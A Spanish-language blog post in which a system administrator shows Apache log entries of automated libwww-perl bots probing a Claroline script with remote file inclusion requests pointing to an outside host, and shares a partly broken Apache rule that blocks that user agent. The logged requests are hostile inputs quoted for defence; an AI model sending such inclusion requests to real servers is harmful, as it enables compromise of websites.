Y seguimos con los bots exploiters

Para variar los exploiters automatizados siguen usando libwww-perl… bueno en lighttpd ya lo resolvi, anoche cai en cuenta que tambien en apache estaba teniendo muchas peticiones de estas… y todavia tengo 3 apaches en maquinas relativamente grandes, pero me parece que es un desperdicio de conexiones para la mas pequeña de ellas (384MB), más aun me aburre tener que leer mi reporte de logwatch con un monton de alertas de «probes»…

foobar:/var/log/apache# grep libwww access.log
124.217.247.166 – – [06/Mar/2008:11:43:01 -0600] «GET /~vicm3/consol2006/Ponencia//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 391 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:11:43:01 -0600] «GET //claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 364 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:12:01:42 -0600] «GET /~vicm3/plataformas/Plataformas%20UPN%201-8-2006.ppt//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 412 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:12:01:43 -0600] «GET /~vicm3/plataformas//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 383 «-» «libwww-perl/5.79»
foobar:/var/log/apache#

Y no tenia bien esto, por un error en un bomberazo anterior en donde los vhost los habia definido con common en lugar de combined, por lo que no estaba guardando los nombres de los agentes (si se que es casi trivial cambiar el agent en script de perl, en todo caso, eso deja fuera a los wanna-be).

Bueno tal cual lo intente con lighttpd pues a buscar como han resuelto otros el problema, me encontre con un muy buen ejemplo para evitar el harvesting de emails, pero mejor aún en los comentarios me encontre algunos tips para implementarlo en http://www.evolt.org/article/Using_Apache_to_stop_bad_robots/18/15126/ apache para bloquear scripts que intenten vulnerabilidades.

[code=’Apache’]
### Anti exploiters
SetEnvIfNoCase User-Agent «.*libwww.*» bad_bot


Order Allow,Deny
Allow from all
Deny from env=bad_bot

SetEnvIfNoCase User-Agent

Esta entrada fue publicada en Sin categoría. Guarda el enlace permanente.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.